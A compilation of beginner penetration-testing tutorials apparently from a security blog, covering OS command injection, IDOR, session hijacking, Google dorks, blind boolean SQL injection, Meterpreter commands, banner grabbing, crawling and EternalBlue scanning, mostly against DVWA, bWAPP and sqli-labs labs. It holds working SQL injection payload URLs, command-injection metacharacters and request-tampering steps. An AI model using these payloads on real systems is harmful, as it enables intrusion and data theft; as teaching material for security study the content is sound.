Beginner Guide to OS Command Injection

July 4, 2017, 4:37 am

≫ Next: Beginner Guide to Insecure Direct Object References

≪ Previous: Understanding DOM Based XSS in DVWA (Bypass All Security)

$

0

0

The dynamic Web applications may make the most of scripts to call up some functionality in the command line on the web server to process the input that received from the client and unsafe user input may led to OS command injection.  OS Command injection is refer as shell injection attack arise when an attacker try to perform system level commands through a vulnerable application in order to retrieve information of  web server or try to make unauthorized access into server .

Impact Analysis

Impact: Critical

Ease of Exploitability: Medium

Risk Rating: High

In this attack the attacker will inject his unwanted system level command so that he can fetch the information of web server; for example: ls , whoami , uname -a and etc.

Let’s consider a scenario where web application allows user to PING an IP other user so that it get confirms that the host connection is alive. Through given screenshot it is clear what will be output when host IP will submit.

Verify parameters to inject data

The following parameters should be tested for command injection flaws, as the application may be using one of these parameters to build a command back at the web server:

·         GET: In this method input parameters are sent in URLs.

·         POST: In this method, input parameters are sent in HTTP body.

·         HTTP header: Applications frequently use header fields to discover end users and display requested information to the user based on the value in the headers.

Some of the important header fields to check for command injection are:

·         Cookies

·         X-Forwarded-For

·         User-agent

·         Referrer

METACHARACTER

Using vulnerability scanner attacker come to know that current web application is vulnerable to command injection and try injecting system level unwanted command using Meta character.

Metacharacter are symbolic operators which are use to separate actual command from unwanted command. The ampercent (&) was used as a separator that would divide the authentic input and the command that you are trying to inject.

It will more clear in following image where attacker will inject his payload dir using metacharacter that retrieve present directory of web server.  

As result it will dump following output as shown in given image where it has validated wrong user input.

OS Command Injection Operators

The developer possibly will set filters to obstruct the some metacharacter. This would block our injected data, and thus we need to try out with other metacharacters too, as shown in the following table:

Operators	Description
;	The semicolon is most common metacharacter used to test an injection flaw. The shell would run all the commands in sequence separated by the semicolon.
&	It separates multiple commands on one command line. It runs the first command then the second command.
&&	It runs the command following  && only if the preceding command is successful
||(windows)	It run the command following || only if the preceding command fails. Runs the first command then runs the second command only if the first command did not complete successfully.
|| ( Linux)	Redirects standard outputs of the first command to standard input of the second command
‘	The unquoting metacharacter is used to force the shell to interpret and run the command between the backticks. Following is an example of this command: Variable= "OS version `uname -a`"&& echo $variable
()	It is used to nest commands
#	It is used as command line comment

Steps to exploit – OS Command Injection

Step 1: Identify the input field

Step 2: Understand the functionality

Step 3: Try the Ping method time delay

Step 4: Use various operators to exploit OS command Injection

Type of Command Injection

Error based injection: When attacker injects a command through an input parameter and the output of that command is displayed on the certain web page, it proof that the application is vulnerable to the command injection. The displayed result might be in the form of an error or the actual outcomes of the command that you tried to run. An attacker then modifies and adds additional commands depending on the shell the web server and assembles information from the application.

Blind based Injection: The results of the commands that you inject will not displayed to the attacker and no error messages are returned it similar as blind SQL injection. The attacker will use another technique to identify whether the command was really executed on the server.

Mitigation-OS Command Injection

·         Strong server side validation

·         Implement a white list

·         OS Hardening

·         Use build in API’s for interacting with the OS if needed. More secure!!

·         Avoid applications from calling out directly the OS system commands

---

Beginner Guide to Insecure Direct Object References

July 4, 2017, 11:09 am

≫ Next: Beginner Guide to Understand Cookies and Session Management

≪ Previous: Beginner Guide to OS Command Injection

$

0

0

Insecure Direct Object References (IDOR) has been placed fourth on the list of OWASP Top 10 Web application security risks since 2013. It allows an authorized user to obtain the information of other users, and could be establish in any type of web applications. Basically it allows requests to be made to specific objects through pages or services without the proper verification of requester’s right to the content.

OWASP definition:Insecure Direct Object References allow attackers to bypass authorization and access resources directly by modifying the value of a parameter used to directly point to an object. Such resources can be database entries belonging to other users, files in the system, and more. This is caused by the fact that the application takes user supplied input and uses it to retrieve an object without performing sufficient authorization checks.

The Application uses untested data in a SQL call that is accessing account information.

Let consider a scenario where a web application allow the login user to change his secret value.

Here you can see the secret value must be referring to some user account of the database.

Currently user bee is login into web server for changing his secret value but he is willing to perform some mischievous action that will change the secret value for other user.

Using burp suite we had captured the request of browser where you can see in the given image login user is bee and secret value is hello; now manipulate the user from another user.

SQLquery = "SELECT * FROM useraccounts WHERE account = ‘bee’;

Now let’s change user name into raj as shown in given image. To perform this attack in an application it requires atleast two user accounts.

SQLquery = "SELECT * FROM useraccounts WHERE account = ‘raj’;

Great!!!  We have successfully changed the secret value for raj.

Note: in any official website the attacker will replace user account from admin account.

Let take another scenario that look quite familiar for most of IDOR attack.

Many times we book different order online through their web application for example bookmyshow.com for movie ticket booking.

Let consider same scenario in bwapp for movie ticket booking, where I had book 10 tickets of 15 EUR for each.

Now let’s confirm it and capture the browser request through burp suite.

Now you can see we have intercepted request where highlighted text contains number of tickets and price of one ticket i.e 15 EUR it means it will reduce 150 EUR from my (user) account; now manipulate this price from your desire price.

I had changed it into 1 EUR which means now it will reduce only 10 EUR from account, you can observe it from given image then forward the request.

Awesome!!!We had booked the 10 tickets in 10 EUR only.

Beginner Guide to Understand Cookies and Session Management

July 6, 2017, 11:04 am

≫ Next: Beginner Guide to Google Dorks (Part 1)

≪ Previous: Beginner Guide to Insecure Direct Object References

$

0

0

Cookie is a small piece of data sent by a server to a browser and stored on the user's computer while the user is browsing. Cookies are produced and shared between the browser and the server using the HTTP Header.

It Allows server store and retrieve data from the client, It Stored in a file on the client side and maximum size of cookie that can stored is limited upto 4K in any web browser. Cookies have short time period because they have expiry date and time as soon as browser closed.

Example-when you visit YouTube and search for Bollywood songs, this gets noted in your browsing history, the next time you open YouTube on your browser, the cookies reads your browsing history and you will be shown Bollywood songs on your YouTube homepage

Creating cookie

The setcookie()function is used for the cookie to be sent along with the rest of the HTTP headers.

When developer creates a cookie, with the function setcookie, he must specify atleast three arguments. These arguments are setcookie(name, value, expiration);

Cookie Attributes

1.      Name:Specifies the name of the cookie

2.      Value:Specifies the value of the cookie

3.      Secure: Specifies whether or not the cookie should only be transmitted over a secure HTTPS connection. TRUE indicates that the cookie will only be set if a secure connection exists. Default is FALSE

4.      Domain:Specifies the domain name of the cookie. To make the cookie available on all subdomains of example.com, set domain to "example.com". Setting it to www.example.com will make the cookie only available in the www subdomain

5.      Path: Specifies the server path of the cookie. If set to "/", the cookie will be available within the entire domain. If set to "/php/", the cookie will only be available within the php directory and all sub-directories of php. The default value is the current directory that the cookie is being set in

6.      HTTPOnly: If set to TRUE the cookie will be accessible only through the HTTP protocol (the cookie will not be accessible by scripting languages). This setting can help to reduce identity theft through XSS attacks. Default is FALSE

7.      Expires:Specifies when the cookie expires. The value: time ()+86400*30, will set the cookie to expire in 30 days. If this parameter is omitted or set to 0, the cookie will expire at the end of the session (when the browser closes). Default is 0

Necessity of Cookies

Cookies can be used for various purposes –

§  Identifying Unique Visitors.

§  Http is a stateless protocol; cookies permit us to track the state of the application using small files stored on the user’s computer.

§  Recording the time each user spends on a website.

Type of cookies

Session Cookie

This type of cookies dies when the browser is closed because they are stored in browser’s memory. They’re used for e-commerce websites so user can continue browsing without losing what he put in his cart. If the user visits the website again after closing the browser these cookies will not be available. It is safer, because no developer other than the browser can access them.

Persistent Cookie

These cookies do not depend on the browser session because they are stored in a file of browser computer. If the user closes the browser and then access the website again then these cookies will still be available. The lifetime of these cookies are specified in cookies itself (as expiration time). They are less secure.

Third Party Cookie

A cookie set by a domain name that is not the domain name that appears in the browser address bar these cookies are mainly used for tracking user browsing patterns and/or finding the Advertisement recommendations for the user.

Secure Cookie

A secure cookie can only be transmitted over an encrypted connection.  A cookie is made secure by adding the secure flag to the cookie. Browsers which support the secure flag will only send cookies with the secure flag when the request is going to a HTTPS page.

HTTP Only Cookie

It informs the browser that this particular cookie should only be accessed by the server. Any attempt to access the cookie from client script is strictly prohibited. This is an important security protection for session cookies.

Zombies Cookie

A zombie cookie is an HTTP cookie that is recreated after deletion. Cookies are recreated from backups stored outside the web browser's dedicated cookie storage.

Sessions

PHP session: when any user made any changes in web application like sign in or out, the server does not know who that person on the system is. To shoot this problem PHP session introduce which store user information to be used across several web pages.

Session variables hold information about one single user, and are exist to all pages in one application.

Example: login ID user name and password.

Session ID

PHP code generates a unique identification in the form of hash for that specific session which is a random string of 32 hexadecimal numbers such as 5f7dok65iif989fwrmn88er47gk834 is known as PHPsessionID.

A session ID or tokenis a unique number which is used to identify a user that has logged into a website. Session ID is stored inside server, it is assigns to a specific user for the duration of that user's visit (session). The session ID can be stored as a cookie, form field, or URL.

Explanation:

Now let’s have a look over this picture and see what this picture says:

In given picture we can clearly see there are three components inside it: HTTP Client, HTTP server and Database(holding session ID).

Step1:client send request to server via POST or GET.

Step2:session Id created on web server. Server save session ID into database and using set-cookie function send session ID to the client browser as response.

Step3: cookie with session ID stored on client browser is send back to server where server matches it from database and sends response as HTTP 200 OK.

Session hijacking

As we know different users have unique session ID when an attacker sniff the session via man-in-middle attack or via XSS and steal session ID or session token this is called session hijacking. When attacker sends the stealing session ID to web server, server match that ID from database stored session ID. If they both matched to each other then the server reply with HTTP 200 OK and attacker get successfully access without submitting proper Identification.

Session hijacking tutorial

For this tutorial I have targeted DVWA, here cookie name is dvwa Session.

Note: session ID for this page will change every time when we will close the browser.

Now capture the browser request using burp suite.

From given image we can see the cookie holds PHPSESSID P38kq30vi6arr0b321p2uv86k0; now send this intercepted data into repeater to observe its response.

In response you can see the highlighted data show set –cookie: dvwaSession =1 more over HTTP 200 OK response from server side.

According to developer each time a new sessionID will generate by server each time, but attacker sniff this session ID P38kq30vi6arr0b321p2uv86k0 for unauthorized login.

Next time we receive another session id when data is intercepted through burp suite i.e. PHPSESSID= gutnu601knp4qsrgfdb4ad0te3, again send this intercepted data into repeater to observe its response.

But before we perceive its response, replace new PHPSESSID from old PHPSESSID.

From given image you can observe we have replaced the SESSION ID and then generate its response in which set –cookie: dvwaSession =6 and HTTP 200 OK response from server side.  

Now change the value inside intercepted data and then forward this request to the server.

Session Vs cookies

Session	Cookies
Data are stored on Server	Data are stored in Client’s Browser
Sessions Data are more secure because they never travel on every HTTPRequest	Travel with each and Every HTTP request
You can store Objects (Store Large Amount of Data)	You can store strings type (Max File Size 4 kb)
Session Cannot be used for Future Reference	Cookies are mostly used for future reference

Beginner Guide to Google Dorks (Part 1)

July 7, 2017, 9:02 am

≫ Next: Beginner Guide to SQL Injection Boolean Based (Part 2)

≪ Previous: Beginner Guide to Understand Cookies and Session Management

$

0

0

Google is a tool which helps in finding what one is looking for. Google operators are the terms provided to us for making our search easy and refined. These operators also termed as advanced Google operators provides the exact information. It reduces the time of search by instantly providing the information as we don’t have to move from one page to another one. These operators’ works as a query.

The basic syntax is->operator: term to be searched

Some of these operators are enlisted below:

Intitle

e.g->intitle:hackingarticles

This query will return the pages which include the term “hackingarticles”in it.

inurl

e.g->inurl:hackingarticles

This query will return the pages which includes the term hackingarticles in its URL.

Related

e.g->related:pentest

It will provide the result related to our query i.e.pentest

Allintext

This operator will perform the task of locating a particular string in the text of the page .

e.g->allintext:rajchandel

The above given query will return only those pages which include the terms rajchandel in the text.

Filetype

e.g->www.kccitm.edu.in filetype:pdf

This query searches the file of the provided extension only. The above given query will search only the pdf files present on the given site.

Cache

This operator will show the cached version of the webpage instead of the current one. This operator is followed by the URL of the page of which we want to have the cached version.

Define

This operator provides the definition of a term as a result.

e.g->define:pentest.

Link

This operator will help you to search the pages which links to other pages. This operator is provided a URL instead of a term to search.

e.g->link:www.kccitm.edu.in

Allintitle

This operator is slightly different from the intitle operator.

In intitle operator there was no compulsion of the term in the query to be present in the title whereas in allintitle operator this is must for the term in the query to be present in the title.

e.g->allintitle:hackingarticles

ADVANTAGES:

1. These operators provides the exact results which we are looking for.

2. There is no wastage of time as there is no redirecting from one page to another.

3. There are different operators for every task to perform i.e. Phonebook to obtain residential and business phone numbers and so on.

DISADVANTAGES

1. There are some operators which do not mix with another in the same query, for e.g, allintitle,allintext operators .

BASIC GUIDELINES TO USE GOOGLE OPERATORS

1. There should be no space between the operators, colon and the search as violating this rule will not generate the desired result.

2. If the search term is a phrase then there should be no space between the operator, colon as well as the first quote of the phrase.

3. Some advanced operators cannot be combined with others such as allintitle, allintext etc.

4. Boolean operators and special characters such as ‘OR’ and ‘+’ can be used in the queries but they should not be placed in the way of the colon.

HOW HACKERS USE GOOGLE OPERATORS

Everyone  use google but most of them don’t know to make use of google.

Google operators are very famous among hackers and they take full benefit of it.

Sensitive information needed by hackers which are not easily retrieved through common search can be produced by the help of google operators.

If a hacker wants to retrieve a pdf file of a particular site then he/she has to use the operator “Filetype” with the URL as well  as the extension of the file.

A hacker can retrieve the site of the specified domain with the help of the operator “site”. This operator is followed by the separating colon and the  domain name.

It’s an easy tool for a hacker to get the exact outcome in just a click.

Thanks for reading the article. In next article we will be discussing about more google dorks with web penetration testing.

Author: Shrishtee Suman is Technical Writer in hacking Articles she is pursuing B. Tech in CS. Her interests are mainly in Web Penetration testing and vulnerability research. ContactHere

Beginner Guide to SQL Injection Boolean Based (Part 2)

July 9, 2017, 12:37 am

≫ Next: Beginner Guide to Meterpreter (Part 1)

≪ Previous: Beginner Guide to Google Dorks (Part 1)

$

0

0

Their so many ways to hack the database using SQL injection as we had seen in our previous tutorial Error based attack, login formed based attack and many more different type of attack in order to retrieve information from inside database. In same way today we will learn a new type of SQL injection attack known as Blind Boolean based attack.

An attacker always check SQL injection vulnerability using comma (‘) inside URL  to break the statement in order to receive sql error message. It is a fight between developer and attacker, the developer increases the security level and attacker try to break it. This time developer had blocked error message as the output on the website. Hence if database is vulnerable to SQL injection then attacker do not obtain any error message on website.Attacker will try to confirm if the database is vulnerable to Blind SQL Injection by evaluating the results of various queries which return either TRUE or FLASE.

Let’s start!!

Using Dhakkan we will demonstrate blind SQL injection.

Lesson 8

Lesson 8 is regarding blind boolean based injection therefore first we need to explore http://localhost:81/sqli/Less-8/?id=1 on browser, this will send the query into database.

SELECT * from table_name WHERE id=1

As output it will display “you are in” the yellow color text on the web page as shown in given image.

When attacker tries to break this query using comma (‘) http://localhost:81/sqli/Less-8/?id=1’

 Or other different technique he will not able to found any error message. More over yellow color text will disappear if attack tries to inject invalid query which also shown in given image.

Then attacker will go for blind sql injection to make sure, that inject query must return an answer either true or false.

http://localhost:81/sqli/Less-8/?id=1' AND 1=1 --+

SELECT * from table_name WHERE id=1’ AND 1=1

Now database test for given condition whether 1 is equal to 1if query is valid it returns TRUE, from screenshot you can see we have got yellow color text again “you are in”, which means our query is valid.

In next query which check for URL

http://localhost:81/sqli/Less-8/?id=1' AND 1=0 --+

SELECT * from table_name WHERE id=1’ AND 1=0

Now it will test the given condition whether 1 is equal to 0 as we know 1 is not equal to 0 hence database answer as ‘FLASE’ query. From screenshot it confirms when yellow color text get disappear again.

Hence it confirms that the web application is infected to blind sql injection. Using true and false condition we are going to retrieve database information.

Length of database string

Following query will ask the length of database string. For example the name of database is IGNITE which contains 6 alphabets so length of string for database IGNITE is equal to 6.

Similarly we will inject given below query which will ask whether length of database string is equal to 1, in response of that query it will answer by returning TRUE or FALSE through text “you are in”.

http://localhost:81/sqli/Less-8/?id=1' AND (length(database())) = 1--+

From given screenshot you can see again the text gets disappear which means it has return FALSE to reply NO the length of database string is not equal to 1

http://localhost:81/sqli/Less-8/?id=1' AND (length(database())) = 2--+

Again it will test the length of database string is equal to 2; it has return FALSE to reply NO the length of database string is not equal to 2. Repeat the same step till we do not receive TRUE for string length 3/4/5/ and so on.

http://localhost:81/sqli/Less-8/?id=1' AND (length(database())) = 8--+

when I test for string is equal to 8; it answer astrue and as result yellow color text “you are in” appears again.

As we know computer does not understand human language it can read only binary language therefore we will use ASCII code. The ASCII code associates an integer value for all symbols in the character set, such as letters, digits, punctuation marks, special characters, and control characters.

For example look at following string ascii code:

1 = I = 73

2 = G = 71

3 = N = 78

4 = I = 73

5 = T = 84

6 = E = 69

Further we will enumerate database name using ascii character for all 8 strings.

Next query will ask from database test the condition whether first string of database name is greater than 100 using acsii substring.

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select database()),1,1))) > 100--+

It reflects TRUE condition hence if you match the ascii character you will observe that from 100 small alphabets string has been running till 172.

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select database()),1,1))) > 120--+

Similarly it will test again whether first letter is greater than 120. But this time it return FALSE which means the first letter is greater than 100 and less than 120.

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select database()),1,1))) > 101--+

Now next it will equate first string from 101, again we got FLASE.

We  had perform this test from 101 till 114 but receive FLASE every time.

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select database()),1,1))) > 114--+

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select database()),1,1))) = 115--+

Finally receive TRUE reply at 115 which means first string is equal to 115, where 115 =‘s’

Similarly test for second string, repeat above step by replacing first string from second.

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select database()),2,1))) > 100--+

I received TRUE reply at 101 which means second string is equal to 101 and 101 = ‘e’.

Similarly I had performed this for all eight strings and got following result:

1 = s = 115

2 = e = 101

3 = c =99

4 = u =117

5 = r =114

6 = i = 105

7 = t = 116

8 = y = 121

Table string length

We have to use same technique for enumerating information of the table from inside the database. Given query will test the condition whether the length of string for first table is greater than 5 or not.

http://localhost:81/sqli/Less-8/?id=1' AND (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) > 5 --+

In reply we receive TRUE and text “you are in” appears again on the web site.

Given query will test the condition whether the length of string for first table is greater than 6 or not.

http://localhost:81/sqli/Less-8/?id=1' AND (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) > 6 --+

In reply we receive FALSE and text “you are in” disappears again from the web site.

Given query will test the condition whether the length of string for first table is equal to 6 or not.

http://localhost:81/sqli/Less-8/?id=1' AND (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) = 6 --+

In reply we receive TRUE and text “you are in” appears again on the web site.

Similarly I test for second and third table using same technique by replacing only table number in same query.

Similarly enumerating fourth table information using following query to test the condition whether the length of string for fourth table is equal to 5 or not.

http://localhost:81/sqli/Less-8/?id=1' AND (length((select table_name from information_schema.tables where table_schema=database() limit 3,1))) = 5 --+

In reply we receive TRUE and text “you are in” appears again on the web site.

As we had performed in database enumeration using ascii code similarly we are going to use same technique to retrieve table name.

Further we will enumerate 4^th table name using ascii character for all 5 strings.

Next query will ask from database to test the condition whether first string of table name is greater than 115 using acsii substring.

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,1,1))) > 115 --+

It reflects TRUEcondition text “you are in” appears again on the web site hence if you match the ascii character.

Next query will ask from database to test the condition whether first string of table name is greater than 120 using acsii substring.

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,1,1))) > 120 --+

But this time it return FALSE which means the first letter is greater than 115 and less than 120.

Proceeding towards equating the string from ascii code between number 115 to 120. Next query will ask from database to test the condition whether first string of table name is greater than 120 using acsii substring.

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,1,1))) = 116 --+

It return FALSE, text get disappear.

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,1,1))) = 117 --+

It returns TRUE, text get appear.

Similarly we had test remaining strings and received following result

1 = u = 117

2 = s = 115

3 = e = 101

4 = r = 114

5 = s = 115

User Name Enumeration

Using same method we are going to enumerate length of string username from inside the table users

Given below query will test for string length is equal to 4 or not.

http://localhost:81/sqli/Less-8/?id=1' AND (length((select username from users limit 0,1))) = 4 --+

It reply TRUE with help of yellow color text

Using same method we are going to enumerate username from inside the table users

Given below query will test for first string using ascii code.

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select username from users limit 0,1) ,1,1))) > 100 --+

We received FALSEwhich means the first string must be less than 100.

 http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select username from users limit 0,1) ,1,1))) > 50 --+

 We received TRUEwhich means the first string must be more than 50.

Similarly,

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select username from users limit 0,1) ,1,1))) > 60 --+

We received TRUEwhich means the first string must be more than 60.

Similarly,

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select username from users limit 0,1) ,1,1))) > 70 --+

 We received FALSEwhich means the first string is less than 70.

Hence first string must lie between 60 and 70 of ascii code.

Proceeding towards comparing string from different ascii code using following query.

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select username from users limit 0,1) ,1,1))) = 68 --+

This time successfully receive TRUE with appearing text “you are in”.

Similarly I had test for all four string in order to retrieve username:

1 = D = 68

2 = u = 117

3 = m = 109

4 = b = 98

Hence today we had learned how attacker hacked database using blind sql injection.

!!Try yourself to retrieve password for user dumb!!

Beginner Guide to Meterpreter (Part 1)

July 11, 2017, 2:36 am

≫ Next: 5 ways to Banner Grabbing

≪ Previous: Beginner Guide to SQL Injection Boolean Based (Part 2)

$

0

0

Metasploit is a security project or we can say a framework provided to us in order to run exploit code in the target’s PC.

Metasploit in current scenario includes more than 1600 exploits. It has more than 420 payloads right now which includes command shell, Meterpreter etc.

Meterpreter is generated only when the session is created. It helps in gaining full access of the target machine.

Once the meterpreter is generated we can have full access of the target machine. Meterpreter includes more than 300 commands which can help us in exploiting the target machine. Help command is the most basic meterpreter command which will provide us all the commands which can be performed on the target machine.

Some of the meterpreter commands are given below:

Sysinfo

This command will provide the system’s information of the victim. It will provide us every detail of the victim’s PC such as architecture, Operating system in the target machine, how many users are logged in into that machine, system’s language.

Getuid

This command will provide the identification of the user of the remote PC.

Getprivs

This command check the privilege present in the remote PC. If the enabled process privileges are less than the current working user is not the admin.

Pwd

Pwd stands for present working directory. It shows the current working directory in the remote PC.

The image above clearly shows that the user is currently in the Downloads.

PS

PS command here stands for process. It will show all the running processes in the remote PC.

The image above is providing all the running processes followed by the process id in the victim’s PC.

Keylogger

Keylogger includes 3 basic functions:

keyscan_start

This command will start scanning the keyboard activity of the remote PC.

keyscan_dump

This command will dump the keyboard activity of the remote PC i.e,it will capture the input and display on our screen .

keyscan_stop

This command will stop scanning the keyboard activity of the remote PC.

As we can clearly see in the above given image that the input given by the victim is visible to us.

Show_mount

This command will show all the drives present in the remote PC.The drives with the total size and available size in target’s PC is displayed below.

Screenshot

By using this command screenshot of the remote PC is captured and is saved in our PC. The path is also provided where the screenshot is saved as shown in the image below.

Upload

By using this command we can upload any file into the victim’s PC.

To upload the file in remote PC we have to provide the path of the file with the filename and extension of the file as well as the destination where we want to upload.

Download

By using this command we can download any file from the victim’s PC.

To download the file we have to first provide the path from where we want to download followed by the file name and extension of the file. In the last we have to add the path where we want to save that downloaded file.

Shell

Shell command will provide us the access of the command prompt of the remote PC. After having access of the command prompt we can use any cmd command to exploit victim’s PC.

Getsid

In this command sid stands for security identifier. This command will provide the server sid.

Ipconfig

This command will tell us the IP Address of the remote PC. We will also be able to know the Mac Address of the remote PC.

Background

This command will send the current active meterpreter session to the background. If you want to go back on the previous session just write sessions and then we will be able to see the active session in our PC. If there is more than one session then we only have to write sessions followed by the session id and we will have the access of that machine whose session id we just selected.

Migrate

This command helps in transferring the current going process from one port to another port.

As you can see in the image above we have transferred the current going process from port no 3872 to port no 2224.

Reboot

This command will reboot the remote PC.

Webcam_snap

This command will take a snap of the remote PC.

As you can see the above given image is the snap taken by the remote PC.

Getpid

This command will provide us the process id of the current running process. The current running process in the target machine has process id 9040 which is displayed in the below provided image.

Localtime

This command will just show us the date and time of the remote PC.

Checksum

This command will provide the hash value of the given file. We just have to write the command followed by the name of the file as well as the extension of it. Hash value is basically the value distinctly generated for every file to maintain the integrity of the file. If there is any kind of modification in the file the hash value is changed even if there is a modification of a single character.

The above given image provides the hash value of the file kJMKzE.

Thank You for reading this article.  We will be discussing about more meterpreter commands in the next article.

5 ways to Banner Grabbing

July 12, 2017, 10:09 am

≫ Next: 5 Ways to Crawl a Website

≪ Previous: Beginner Guide to Meterpreter (Part 1)

$

0

0

Banner are refers as text message that received from host. Banners usually contain information about a service, such as the version number.

Banner grabbing is a process to collect details regarding any remote PC on a network and the services running on its open ports. An attacker can make use of banner grabbing in order to discover network hosts and running services with their versions on their open ports and more over operating systems so that he can exploits it.

Nmap

A simple banner grabber which connects to an open TCP port and prints out anything sent by the listening service within five seconds.

The banner will be shortened to fit into a single line, but an extra line may be printed for every increase in the level of verbosity requested on the command line.

Type following command which will fetch banner for every open port in remote PC.

nmap -sV --script=banner 192.168.1.106

From screenshot you can read the services and their version for open ports fetched by NMAP Script to grab banner for the target 192.168.1.106

Following command will grab the banner for selected port i.e. 80 for http service and version.

nmap -Pn -p 80 -sV --script=banner 192.168.1.106

As result it will dumb “http-server-header: Apache/2.2.8 (Ubuntu) DAV/2”

CURL

Curl –I is use for head in order to shown document information only; type following command to grab HTTP banner of remote PC.

curl -s -I 192.168.1.106 | grep -e "Server: "

As result it will dumb “http-server-header: Apache/2.2.8 (Ubuntu) DAV/2”

TELNET

Type following command to grab SSH bannerof remote PC.

telnet 192.168.1.106 22

As result it will dumb “SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1”

 NETCAT

Type following command to grab SSH bannerof remote PC.

nc –v 192.168.1.106 22

As result it will dumb “SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1”

 DMITRY

DMitry (Deepmagic Information Gathering Tool) is a UNIX/(GNU)Linux Command Line Application coded in C. DMitry has the ability to gather as much information as possible about a host. Base functionality is able to gather possible subdomains, email addresses, uptime information, tcp port scan, whois lookups, and more.

Dmitry –b is use for banner grabbing for all open ports; Type following command to grab SSH banner of remote PC.

dmitry -b 192.168.1.106

From screenshot you can see it has shown banner for open port 21, 22, 23and 25.

In this way Attacker can grab the services and their version for open ports on remote PC.

5 Ways to Crawl a Website

July 15, 2017, 9:39 pm

≫ Next: 3 ways to scan Eternal Blue Vulnerability in Remote PC

≪ Previous: 5 ways to Banner Grabbing

$

0

0

A Web crawler, sometimes called a spider, is an Internet bot that systematically browses the World Wide Web, typically for the purpose of Web indexing .

A Web crawler starts with a list of URLs to visit, called the seeds. As the crawler visits these URLs, it identifies all the hyperlinks in the page and adds them to the list of URLs to visit.  If the crawler is performing archiving of websites it copies and saves the information as it goes. The archive is known as the repository and is designed to store and manage the collection of web pages. A repository is similar to any other system that stores data, like a modern day database.

Let’s Begin!!

Metasploit

This auxiliary module is a modular web crawler, to be used in conjuntion with wmap (someday) or standalone.

use auxiliary/crawler/msfcrawler

msf auxiliary(msfcrawler) > set rhosts www.tptl.in

msf auxiliary(msfcrawler) > exploit

From, screenshot you can see it has loaded crawler in order to exact hidden file from any website, for example about.php, jquery contact form, html and etc which is not possible to exact manually from website using browser. For information gathering of any website we can use it.

HTTRACK

HTTrack is a free and open source Web crawler and offline browser, developed by Xavier Roche

It allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer. HTTrack arranges the original site's relative link-structure. 

Type following command inside the terminal

httrack http://tptl.in -O /root/Desktop/file

It will save the output inside given directory /root/Desktop/file

From given screenshot you can observe this, it has dumb the website information inside it which consist html file as well as JavaScript and jquery.

BLACK WIDOW

This Web spider utility detects and displays detailed information for a user-selected Web page, and it offers other Web page tools.

BlackWidow's clean, logically tabbed interface is simple enough for intermediate users to follow but offers just enough under the hood to satisfy advanced users. Simply enter your URL of choice and press Go. BlackWidow uses multithreading to quickly download all files and test the links. The operation takes only a few minutes for small Web sites.

You can download it from here.

Enter your URL http://tptl.in in Address field and press Go.

Click on start button given on left side to begin URL scanning and select a folder  to save the output file.

Fromscreenshot you can observe that I had browse C:\Users\RAJ\Desktop\tptl in order to store output file inside it.

When you will open target folder tptl you will get entire data of website either image or content, html file, php file and JavaScript all are saved in it.

WEBSITE RIPPER COPIER

Website Ripper Copier (WRC) is an all-purpose, high-speed website downloader software to save website data. WRC can download website files to local drive for offline browsing, extract website files of a certain size and type, like image, video, picture, movie and music, retrieve a large number of files as a download manager with resumption support, and mirror sites. WRC is also a site link validator, explorer, and tabbed anti pop-up Web / offline browser.

Website Ripper Copier is the only website downloader tool that can resume broken downloads from HTTP, HTTPS and FTP connections, access password-protected sites, support Web cookies, analyze scripts, update retrieved sites or files, and launch more than fifty retrieval threads

You can download it from here.

Choose “web sites for offline browsing” option.

Enter the website URL as http://tptl.in and click on next.

Mention directory path to save the output result and clickrun now.

When you will open selected folder tp you will get fetched css,php,html and js file inside it.

BURP SUITE SPIDER

Burp Spider is a tool for automatically crawling web applications. While it is generally preferable to map applications manually, you can use Burp Spider to partially automate this process for very large applications, or when you are short of time.

For more detail read our privious articles from here.

From given screenshot you can observe that I had fetched the http request of http:// tptl.in; now send to spider with help of action tab.

The targeted website has been added inside the site map under target tab as a new scope for web crawling.  From screenshot you can see it started web crawling of the target website where it has collected the website information in the form of php, html and js.

---

3 ways to scan Eternal Blue Vulnerability in Remote PC

July 18, 2017, 10:25 pm

≫ Next: Vulnerability Analysis in Web Application using Burp Scanner

≪ Previous: 5 Ways to Crawl a Website

$

0

0

Hello Friends! As we all known that Microsoft windows 7 are exploitable by eternal blue with SMBv1. Then Microsoft patches this vulnerability by updating the SMB version. Still there are a large number of windows 7 users who didn’t update their system. Now if a security tester wants to separate vulnerable system from update system he requires some scanning to identify vulnerable system.

Eternal scanner is an network scanner for Eternal Blue exploit CVE-2017-0144 .

Target:Windows 7

Attacker:Kali Linux

Open the terminal in your kali Linux and type following command to download it from github.

git clone https://github.com/peterpt/eternal_scanner.git&& cd eternal_scanner

After then when it gets successfully install you need run the script for in Oder to lunch the scanner on terminal by typing following:

./escan

Once the scanner is lunched inside the terminal further it will ask to enter target IP or you can also add a range of IPs for scanning.

We have given only single IP for scanning i.e. 192.168.1.106 as target.

Then it will start scanning and dumb those IP which are vulnerable in given IP range; from screenshot you can observe it has dump 192.168.1.106:445 as vulnerable IP with SMB port 445 and save the output inside/root/eternal_scanner/vulnr.txt

